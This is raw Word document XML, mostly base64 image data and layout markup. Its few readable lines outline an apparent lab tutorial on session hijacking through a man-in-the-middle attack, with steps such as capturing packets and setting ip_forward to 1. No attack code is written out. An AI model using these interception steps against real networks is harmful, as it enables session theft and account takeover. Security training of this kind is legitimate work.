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cY7SRAwQAAO8LAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQB6PrTNR0gBAEdIAQAUAAAAAAAAAAAAAAAAAGwGAABk&#10;cnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAIAAAAIQBYRxSf3QAAAAUBAAAPAAAAAAAAAAAA&#10;AAAAAOVOAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAA&#10;AAAAAAAAAADvTwEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAADgUAEA&#10;AAA=&#10;">
                <v:rect id="Rectangle 2543" o:spid="_x0000_s1147" style="position:absolute;left:59448;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55A86BE4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2544" o:spid="_x0000_s1148" style="position:absolute;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673E188D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2559" o:spid="_x0000_s1149"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Y0xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NawIx&#10;FMTvBf+H8IReimZr/VyNUgrFHrzUevD43Lz9wM3LkkR3/e9NQfA4zMxvmNWmM7W4kvOVZQXvwwQE&#10;cWZ1xYWCw9/3YA7CB2SNtWVScCMPm3XvZYWpti3/0nUfChEh7FNUUIbQpFL6rCSDfmgb4ujl1hkM&#10;UbpCaodthJtajpJkKg1WHBdKbOirpOy8vxgFtb7lp8vYbdvqLZ8teL47fiQ7pV773ecSRKAuPMOP&#10;9o9WMJpMFvD/Jj4Bub4DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAT/T2NMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId48" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2560" o:spid="_x0000_s1150"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6KwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L8w/hDszOpnZUpNMoojPi0hfI7C7NtS02N6WJtv69WQguD+edLXpTizu1rrKsYBTFIIhzqysu&#10;FJyOf8MZCOeRNdaWScGDHCzmH4MMU2073tP94AsRQtilqKD0vkmldHlJBl1kG+LAXWxr0AfYFlK3&#10;2IVwU8skjqfSYMWhocSGViXl18PNKPjtkrP/322us9HF6mZcrPl7d1Tq67Nf/oDw1Pu3+OXeagXJ&#10;ZBr2hzfhCcj5EwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO583orBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E06A961" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We Start Session Hijacking </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Man In the Middle Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009CA0AB"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691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B476622" wp14:editId="7D262C8B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41850" name="Group 4185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80" name="Shape 496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81" name="Shape 496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82" name="Shape 496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83" name="Shape 496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84" name="Shape 496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850" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49685" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49686" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49687" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49688" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4968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692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C87DCFD" wp14:editId="43359F91">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41854" name="Group 4185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690" name="Shape 496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91" name="Shape 496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92" name="Shape 496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693" name="Shape 496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94" name="Shape 496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854" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49695" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49696" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49697" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49698" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4969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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Start By capturing Packets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC7CF7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B37465A" wp14:editId="1292F23E">
                <wp:extent cx="5986882" cy="3761715"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41848" name="Group 41848"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3761715"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3761715"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2549" name="Rectangle 2549"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="566C2192"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550" name="Rectangle 2550"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="713070" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6EECCA6A"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3 :</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2551" name="Rectangle 2551"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="534873" y="202692"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="59C693E6"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552" name="Rectangle 2552"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="577545" y="202692"/>
                            <a:ext cx="1687411" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="48E4C848" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Set </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>ip_forward</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> to 1</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2553" name="Rectangle 2553"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1847418" y="202692"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="505E262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554" name="Rectangle 2554"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3612515"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="21DDC168"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2562" name="Picture 2562"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId49"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="389082"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2563" name="Shape 2563"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="376382"/>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37465A" id="Group 41848" o:spid="_x0000_s1151" style="width:471.4pt;height:296.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,3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ES8gwQAADYTAAAOAAAAZHJzL2Uyb0RvYy54bWzkWG1v2zYQ/j5g&#10;/0HQ98aSZcmSEKcYmjUoMKxB2/0AmqIsYRRJkPTbfv3uSEl2Y2d1MqD+kACRKfF4fO65I3nH2/e7&#10;jgcbpk0rxSKMb6IwYILKqhWrRfjXt4/v8jAwloiKcCnYItwzE76/+/WX260q2VQ2kldMB6BEmHKr&#10;FmFjrSonE0Mb1hFzIxUT0FlL3RELr3o1qTTZgvaOT6ZRlE22UldKS8qMga/3vjO8c/rrmlH7ua4N&#10;swFfhIDNuqd2zyU+J3e3pFxpopqW9jDIK1B0pBUw6ajqnlgSrHV7oqprqZZG1vaGym4i67qlzNkA&#10;1sTRE2setFwrZ8uq3K7USBNQ+4SnV6ulf24etPqqHjUwsVUr4MK9oS27Wnf4CyiDnaNsP1LGdjag&#10;8DEt8izPp2FAoS+ZZ/E8Tj2ptAHmT8bR5vcfjJwME0++g7NVECDmwIH5fxx8bYhijlpTAgePOmir&#10;RThNZ0UYCNJBpH6B2CFixVngvjp6nOxIlikN8HYxU2mawGJAnuIinyUZ0jQaS0qljX1gsguwsQg1&#10;TO8iimz+MNaLDiI4JRf4FPJjy7nvxS/A2YAKW3a33DnDwKzegKWs9mBtI/U/n2Hd1lxuF6HsWyEu&#10;ZZgce8OAfxLAMq6aoaGHxnJoaMs/SLe2PJzf1lbWrcOLAPxsPS5wH8bYT/FjCrBP/QhfexrA55f6&#10;cRpNs2Lqg3oI+3mcRHOY4jrePJjxVrwZn/Vm/CJvpsksnydhAAvwnEvTtJhB75U8OpryVjwKR8aZ&#10;9emWGW4RF63PdD5PZ+mzHo2zfD6LIXSu5NPRmLfiU1g+Z3yavGiVxvkMnAYH5bPL9IrHaDra8lZc&#10;Ojvr0tmLXAob6yyfwmmJKWIWT9MhRRxO0+tuvaMx1/apamkJ/32aD62TFPfH5RCMsmvNwl5Jd5GO&#10;jui/1+odVCSK2HbZ8tbuXXUFCSiCEpvHlmKmiy/H2XI27uIggPNCrgzfIMcaJHEcpqf4/p2aJW8V&#10;5q6YNmK7Bwyl2ZPS5ozNvmy6l3TdMWF9HagZB+xSmK